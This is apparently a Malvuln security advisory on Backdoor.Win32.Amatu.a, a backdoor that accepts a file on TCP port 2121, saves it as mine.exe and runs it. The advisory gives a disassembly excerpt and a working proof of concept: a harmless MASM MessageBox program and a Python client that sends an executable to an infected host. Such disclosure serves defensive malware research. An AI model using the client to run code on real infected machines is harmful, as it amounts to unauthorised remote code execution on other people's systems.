Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source: https://malvuln.com/advisory/1e2d0b90ffc23e00b743c41064bdcc6b.txt
Contact: malvuln13@gmail.com
Media: x.com/malvuln
Threat: Backdoor.Win32.Amatu.a
Vulnerability: Remote Arbitrary File Write (RCE)
Family: Amatu
Type: PE32
MD5: 1e2d0b90ffc23e00b743c41064bdcc6b
SHA256: 77fff9931013ab4de6d4be66ca4fda47be37b6f706a7062430ee8133c7521297
Vuln ID: MVID-2024-0698
Dropped files: mine.exe
Disclosure: 09/27/2024
Description: The malware listens on TCP port 2121. Third-party adversaries who can reach an infected host, can write arbitrary executable code to a file named "mine.exe" to SysWOW64 directory. The mine.exe PE file executes immediately and runs as a child of the parent process malware. Amatu calls several Win32 APIs "GetSystemDirectoryA", "CreateFileA" and "WriteFile" to save the inbound code to disk. Finally, it calls "ShellExecuteA" executing the arbitrary PE file sent by the attacker. Setup a gateway and fake DNS sinkhole to mimic outbound internet access for the C2 or the port may not open.
"Amatu.a" disassembly
call ds:GetSystemDirectoryA
004A1FCB lea ecx, [ebp+Source]
004A1FD1 push ecx ; Source
004A1FD2 lea edx, [ebp+Buffer]
004A1FD8 push edx ; Destination
004A1FD9 call strcat
004A1FDE add esp, 8
004A1FE1 push offset aMine ; "mine"
004A1FE6 lea eax, [ebp+Buffer]
004A1FEC push eax ; Destination
004A1FED call strcat
004A1FF2 add esp, 8
004A1FF5 push offset aExe ; ".exe"
004A1FFA lea ecx, [ebp+Buffer]
004A2000 push ecx ; Destination
004A2001 call strcat
004A2022 call ds:CreateFileA
004A206B call recv
.004A2070 mov [ebp+nNumberOfBytesToWrite], eax
.004A2076 cmp [ebp+nNumberOfBytesToWrite], 0
push eax ; lpNumberOfBytesWritten
004A209C mov ecx, [ebp+nNumberOfBytesToWrite]
004A20A2 push ecx ; nNumberOfBytesToWrite
004A20A3 lea edx, [ebp+buf]
004A20A9 push edx ; lpBuffer
004A20AA mov eax, [ebp+hFile]
004A20B0 push eax ; hFile
004A20B1 call ds:WriteFile
mov ecx, [ebp+hFile]
004A20BF push ecx ; hObject
004A20C0 call ds:CloseHandle
004A20C6 push 1 ; nShowCmd
004A20C8 push 0 ; lpDirectory
004A20CA push 0 ; lpParameters
004A20CC lea edx, [ebp+Buffer]
004A20D2 push edx ; lpFile
004A20D3 push offset Operation ; "open"
004A20D8 push 0 ; hwnd
004A20DA call ds:ShellExecuteA
004A20E0 mov eax, [ebp+s]
004A20E3 push eax ; s
004A20E4 call closesocket
Exploit/PoC:
1) Create a small PE file named "mine.exe", I used MASM and packed it with FSG.
"mine.exe"
include \masm32\include\masm32rt.inc
.data
HATE db "Masm32:", 0
MyReal8 REAL8 123.456
.data?
aDword dd ?
.code
start:
invoke MessageBox, 0, chr$("DOOM!"), addr HATE, MB_OK
mov eax, 123
exit
end start
2) Our custom client to send "mine.exe" to the remote infected host.
from socket import *
MALWARE_HOST="x.x.x.x"
PORT=2121
DOOM="mine.exe"
def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
f = open(DOOM, "rb")
EXE = f.read()
s.send(EXE)
while EXE:
s.send(EXE)
EXE=f.read()
s.close()
print("By Malvuln");
if __name__=="__main__":
doit()
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).